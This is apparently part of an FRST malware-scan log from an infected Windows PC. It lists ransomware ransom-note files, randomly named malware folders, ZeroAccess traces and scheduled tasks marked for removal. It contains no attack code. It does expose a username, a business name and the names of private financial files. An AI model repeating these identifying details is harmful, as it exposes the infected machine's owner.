2014-09-07 00:21 - 2014-09-26 01:05 - 00000348 _____ () C:\Windows\Tasks\At4.job
2014-09-07 00:21 - 2014-09-26 01:05 - 00000346 _____ () C:\Windows\Tasks\At3.job
2014-09-07 00:21 - 2014-09-26 00:05 - 00000348 _____ () C:\Windows\Tasks\At2.job
2014-09-07 00:21 - 2014-09-26 00:05 - 00000346 _____ () C:\Windows\Tasks\At1.job
2014-09-07 00:16 - 2014-09-08 21:58 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Vabuoq
2014-09-07 00:16 - 2014-09-08 19:46 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ymekwea
2014-09-06 23:10 - 2014-09-06 23:10 - 00008172 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-09-06 23:10 - 2014-09-06 23:10 - 00004130 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-09-06 23:10 - 2014-09-06 23:10 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-09-06 23:06 - 2014-09-08 22:32 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Oppaekda
2014-09-06 23:05 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\EbduHufvu
2014-09-06 22:50 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ugyldoz
2014-09-06 22:47 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\EwrovBofre
2014-09-06 22:21 - 2014-09-11 14:32 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ozowweu
2014-09-06 22:20 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\OsesoDnisi
2014-09-06 21:17 - 2014-09-06 21:17 - 00006144 __RSH () C:\Users\smotamedy\AppData\Roaming\{00006DF7-3334-60DC-FBCD-7BF237D757AA}.exe
2014-09-06 18:24 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Nasuqaw
2014-09-06 18:22 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\OlupGawt
2014-09-06 18:17 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ynapocly
2014-09-06 18:14 - 2014-09-06 18:14 - 00000000 ____D () C:\ProgramData\IhegOhrab
2014-09-06 18:00 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Hykikeew
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.URL
2014-09-06 17:57 - 2014-09-08 10:23 - 00000000 ___HD () C:\0e31356
2014-09-06 17:57 - 2014-09-06 17:57 - 00000000 ____D () C:\ProgramData\UsmiTfow
2014-09-05 14:33 - 2014-09-05 14:33 - 00145488 _____ () C:\Windows\Minidump\090514-21075-01.dmp
2014-09-04 08:19 - 2014-09-27 17:57 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-04 08:19 - 2014-09-04 08:19 - 00699568 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-09-04 08:19 - 2014-09-04 08:19 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-27 17:56 - 2014-01-31 12:51 - 01195387 _____ () C:\Windows\WindowsUpdate.log
2014-09-27 16:57 - 2009-07-13 23:34 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-27 16:57 - 2009-07-13 23:34 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-27 16:50 - 2011-02-01 17:06 - 00000000 ____D () C:\Users\smotamedy\Tracing
2014-09-27 16:49 - 2014-04-09 17:55 - 00004348 _____ () C:\Windows\setupact.log
2014-09-27 16:49 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-27 15:19 - 2014-01-29 13:07 - 00000000 ____D () C:\ali
2014-09-27 15:00 - 2010-09-03 03:08 - 00000332 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-09-27 14:49 - 2013-07-23 10:22 - 00000000 ____D () C:\ProgramData\evwqqrk
2014-09-27 14:49 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Speech
2014-09-27 14:48 - 2014-01-30 13:01 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\JAM Software
2014-09-27 14:48 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ezrige
2014-09-27 14:11 - 2009-07-21 00:30 - 00782154 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-24 19:09 - 2010-11-01 09:39 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Skype
2014-09-17 10:22 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-09-14 09:00 - 2010-09-03 03:08 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-09-09 12:17 - 2009-07-13 23:53 - 00032574 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-09-09 11:44 - 2010-10-29 15:17 - 00000000 ____D () C:\Users\administrator
2014-09-08 22:36 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Heyqu
2014-09-08 22:30 - 2011-09-06 17:39 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Mozilla
2014-09-08 22:27 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Fioval
2014-09-08 22:12 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Altyc
2014-09-08 22:02 - 2010-12-03 11:16 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\webex
2014-09-08 21:26 - 2010-10-29 15:38 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Adobe
2014-09-08 21:05 - 2010-10-29 15:29 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\DesktopPwrMgr
2014-09-08 20:57 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Odpya
2014-09-08 20:47 - 2012-11-14 13:39 - 00000000 ___HD () C:\Users\smotamedy\AppData\Roaming\AC8087BE
2014-09-08 18:52 - 2010-10-29 15:38 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Macromedia
2014-09-08 17:47 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Aptu
2014-09-07 03:15 - 2010-10-30 15:16 - 00000176 _____ () C:\Windows\system32\config\netlogon.ftl
2014-09-07 01:28 - 2011-09-06 15:06 - 00000536 _____ () C:\Users\smotamedy\UpToDateDesktop_stout.txt
2014-09-07 01:28 - 2010-11-01 09:20 - 00000000 ____D () C:\Users\smotamedy\UpToDate
2014-09-07 01:28 - 2010-10-29 15:29 - 00000000 ____D () C:\Users\smotamedy
2014-09-07 01:27 - 2012-03-03 11:31 - 00032280 ____N () C:\Users\smotamedy\Documents\Jan expenses 2012.xls
2014-09-07 01:27 - 2011-12-02 13:10 - 00012312 ____N () C:\Users\smotamedy\Documents\October_2011.xlsx
2014-09-07 01:27 - 2011-07-18 14:50 - 00033816 ____N () C:\Users\smotamedy\Documents\Riveroaks OTC 07 11 11 thru 07 15 11.xls
2014-09-07 01:27 - 2011-07-18 14:50 - 00016664 ____N () C:\Users\smotamedy\Documents\Riveroaks OTC 07 04 11 thru 07 08 11.xls
2014-09-07 01:27 - 2011-05-23 12:24 - 00512024 ____N () C:\Users\smotamedy\Documents\MD stats 2010 (9).xls
2014-09-07 01:26 - 2013-07-15 12:31 - 08812568 _____ () C:\Users\smotamedy\Desktop\River Oaks Beauty and Wellness Group (Backup Jul 15,2013 12 30 PM).QBB
2014-09-07 01:26 - 2012-01-05 18:53 - 00030744 ____N () C:\Users\smotamedy\Documents\dec 2011 colection expenses.xls
2014-09-07 01:26 - 2011-12-20 18:38 - 00022552 _____ () C:\Users\smotamedy\Documents\expenses for 2011-2012.xls
2014-09-07 01:26 - 2011-12-02 13:19 - 00030744 ____N () C:\Users\smotamedy\Documents\Copy of Xl0000024.xls
2014-09-07 01:26 - 2011-12-02 13:13 - 00012312 ____N () C:\Users\smotamedy\Documents\collection,expenses Oct 2011.xlsx
2014-09-07 01:26 - 2011-12-02 12:41 - 00030744 ____N () C:\Users\smotamedy\Documents\Copy of Xl0000021.xls
2014-09-07 01:26 - 2011-12-02 11:48 - 00031256 ____N () C:\Users\smotamedy\Documents\Collection,expenses Nov 2011.xls
2014-09-07 01:26 - 2011-07-07 11:41 - 00014616 ____N () C:\Users\smotamedy\Documents\cleaning duties.xls
2014-09-07 01:21 - 2013-07-10 11:58 - 00000000 ____D () C:\Users\Public\Documents\Intuit
2014-09-07 01:21 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-09-06 23:10 - 2013-07-10 11:58 - 00000000 ____D () C:\ProgramData\Intuit
2014-09-06 23:10 - 2010-09-03 03:39 - 00000000 ____D () C:\ProgramData\Lenovo
2014-09-06 23:10 - 2010-09-03 03:08 - 00000000 ____D () C:\ProgramData\PCDr
2014-09-06 23:06 - 2009-07-21 01:20 - 00000000 ____D () C:\SWTOOLS
2014-09-06 23:05 - 2010-09-03 03:09 - 00000000 ___HD () C:\ProgramData\DDNI
2014-09-06 17:58 - 2010-10-30 11:03 - 00000000 ____D () C:\Users\admin
2014-09-06 17:57 - 2009-07-21 01:20 - 00008728 __RSH () C:\BOOTSECT.BAK
2014-09-05 14:33 - 2011-10-31 10:33 - 1273454962 _____ () C:\Windows\MEMORY.DMP
2014-09-05 14:33 - 2011-10-31 10:33 - 00000000 ____D () C:\Windows\Minidump

ZeroAccess:
C:\$Recycle.Bin\S-1-5-21-499009960-272174587-744029597-1146\$0a1e85f3e1cd51d1261ae5ea5aa3df51

ZeroAccess:
C:\$Recycle.Bin\S-1-5-18\$0a1e85f3e1cd51d1261ae5ea5aa3df51

Files to move or delete:
====================
C:\ProgramData\bw5EWA37M.dat
C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At10.job
C:\Windows\Tasks\At11.job
C:\Windows\Tasks\At12.job
C:\Windows\Tasks\At13.job
C:\Windows\Tasks\At14.job
C:\Windows\Tasks\At15.job
C:\Windows\Tasks\At16.job
C:\Windows\Tasks\At17.job
C:\Windows\Tasks\At18.job
C:\Windows\Tasks\At19.job
C:\Windows\Tasks\At2.job
C:\Windows\Tasks\At20.job
C:\Windows\Tasks\At21.job
C:\Windows\Tasks\At22.job
C:\Windows\Tasks\At23.job
C:\Windows\Tasks\At24.job
C:\Windows\Tasks\At25.job
C:\Windows\Tasks\At26.job
C:\Windows\Tasks\At27.job
C:\Windows\Tasks\At28.job
C:\Windows\Tasks\At29.job
C:\Windows\Tasks\At3.job
C:\Windows\Tasks\At30.job
C:\Windows\Tasks\At31.job
C:\Windows\Tasks\At32.job
C:\Windows\Tasks\At33.job
C:\Windows\Tasks\At34.job
C:\Windows\Tasks\At35.job
C:\Windows\Tasks\At36.job
C:\Windows\Tasks\At37.job
C:\Windows\Tasks\At38.job
C:\Windows\Tasks\At39.job
C:\Windows\Tasks\At4.job
C:\Windows\Tasks\At40.job
C:\Windows\Tasks\At41.job
C:\Windows\Tasks\At42.job
C:\Windows\Tasks\At43.job
C:\Windows\Tasks\At44.job
C:\Windows\Tasks\At45.job
C:\Windows\Tasks\At46.job
C:\Windows\Tasks\At47.job
C:\Windows\Tasks\At48.job
C:\Windows\Tasks\At49.job
C:\Windows\Tasks\At5.job
C:\Windows\Tasks\At50.job
C:\Windows\Tasks\At51.job
C:\Windows\Tasks\At52.job
C:\Windows\Tasks\At53.job
C:\Windows\Tasks\At54.job
C:\Windows\Tasks\At55.job
C:\Windows\Tasks\At56.job
C:\Windows\Tasks\At57.job
C:\Windows\Tasks\At58.job
C:\Windows\Tasks\At59.job
C:\Windows\Tasks\At6.job
C:\Windows\Tasks\At60.job
C:\Windows\Tasks\At61.job
C:\Windows\Tasks\At62.job
C:\Windows\Tasks\At63.job
C:\Windows\Tasks\At64.job
C:\Windows\Tasks\At65.job
C:\Windows\Tasks\At66.job
C:\Windows\Tasks\At67.job
C:\Windows\Tasks\At68.job
C:\Windows\Tasks\At69.job
C:\Windows\Tasks\At7.job
C:\Windows\Tasks\At70.job
C:\Windows\Tasks\At71.job
C:\Windows\Tasks\At72.job
C:\Windows\Tasks\At73.job
C:\Windows\Tasks\At74.job
C:\Windows\Tasks\At75.job
C:\Windows\Tasks\At76.job
C:\Windows\Tasks\At77.job
C:\Windows\Tasks\At78.job
C:\Windows\Tasks\At79.job
C:\Windows\Tasks\At8.job
C:\Windows\Tasks\At80.job
C:\Windows\Tasks\At81.job
C:\Windows\Tasks\At82.job
C:\Windows\Tasks\At83.job
C:\Windows\Tasks\At84.job
C:\Windows\Tasks\At85.job
C:\Windows\Tasks\At86.job
C:\Windows\Tasks\At87.job
C:\Windows\Tasks\At88.job
C:\Windows\Tasks\At89.job
C:\Windows\Tasks\At9.job
C:\Windows\Tasks\At90.job
C:\Windows\Tasks\At91.job
C:\Windows\Tasks\At92.job
C:\Windows\Tasks\At93.job
C:\Windows\Tasks\At94.job
C:\Windows\Tasks\At95.job
C:\Windows\Tasks\At96.job

Some content of TEMP:
====================
C:\Users\smotamedy\AppData\Local\Temp\SHSetup.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-09-26 00:05

==================== End Of Log ============================

Addition.txt